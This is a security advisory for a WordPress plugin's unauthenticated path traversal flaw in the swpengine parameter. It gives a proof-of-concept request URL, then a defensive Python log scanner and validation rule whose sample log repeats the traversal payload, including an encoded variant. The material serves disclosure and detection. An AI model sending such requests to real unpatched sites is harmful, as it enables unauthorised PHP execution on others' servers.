WP plugin searchwp-live-ajax-search >= 1.6.2 unauthenticated path traversal

Plugin Slug: searchwp-live-ajax-search
Vulnerability: Unauthenticated path traversal for PHP files.
Vulnerable File: includes/class-client.php
Exploit Author: Muhammad Zeeshan (Xib3rR4dAr)

Description:

The swpengine parameter in includes/class-client.php is not sanitized properly, leading to unauthenticated path traversal. By exploiting the path traversal, it is possible to include and execute PHP files from arbitrary paths. The file is executed even if direct access to the PHP file is not allowed.

PoC:

The following request will include a file named phpinfo.php that is present at an arbitrary path.

https://example.com/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=&swpengine=aaaaaaa/../../asd/phpinfo

Fix:

Update plugin to version 1.6.3, or newer.
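The two things a defender wants from this advisory are a way to spot exploitation attempts in web server logs and a clear picture of what proper sanitization of swpengine looks like. The Python below is an added example, not code from the gist or from the SearchWP plugin: it treats an engine name as a bare identifier (the allowlist regex and the double-decoding step are assumptions of this example), and scans constructed combined-format access-log lines for requests whose swpengine value is anything else, including the traversal value from the PoC above and a URL-encoded variant of it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 1 is a benign engine name, line 2 carries the traversal value from the
# advisory's PoC, line 3 a URL-encoded variant of it, line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=shoes&swpengine=default HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=&swpengine=aaaaaaa/../../asd/phpinfo HTTP/1.1" 200 61250 "-" "curl/7.88"
203.0.113.12 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=b&swpengine=%2e%2e%2F%2e%2e%2Fasd%2Fphpinfo HTTP/1.1" 200 61250 "-" "python-requests/2.31"
203.0.113.13 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php?p=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Hardening rule assumed by this example (not the plugin's own code): an engine
# name is an identifier, never a path, so only lowercase letters, digits, '-' and
# '_' are accepted, and the value is never used to build a file path unchecked.
ENGINE_NAME_RE = re.compile(r"^[a-z0-9_-]{1,64}$")

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(value: str) -> str:
    """Collapse URL encoding (including double encoding) so checks see the real characters."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value


def is_valid_engine_name(value: str) -> bool:
    """Hardened check: accept only a bare identifier; any path syntax is rejected."""
    value = normalize(value)
    if "\x00" in value or "/" in value or "\\" in value or ".." in value:
        return False
    return ENGINE_NAME_RE.fullmatch(value) is not None


def scan_access_log(text: str) -> list[dict]:
    """Flag every request whose swpengine parameter is not a plain engine name."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # parse_qs decodes one layer of percent-encoding; normalize() handles the rest.
        params = parse_qs(url.query, keep_blank_values=True)
        for raw in params.get("swpengine", []):
            if is_valid_engine_name(raw):
                continue
            decoded = normalize(raw)
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "action": params.get("action", [""])[0],
                "swpengine": decoded,
                "reason": "traversal sequence" if ".." in decoded else "non-identifier engine name",
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['reason']}: swpengine={f['swpengine']!r} (HTTP {f['status']})")
```

Run it against a real access log by passing the file contents to scan_access_log; an HTTP 200 on a flagged request is the signal to investigate, since the include succeeded rather than being rejected. The same is_valid_engine_name rule is the shape of the server-side fix: validate the parameter as an identifier before it is ever joined into a path, rather than trying to strip ../ sequences out of it.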
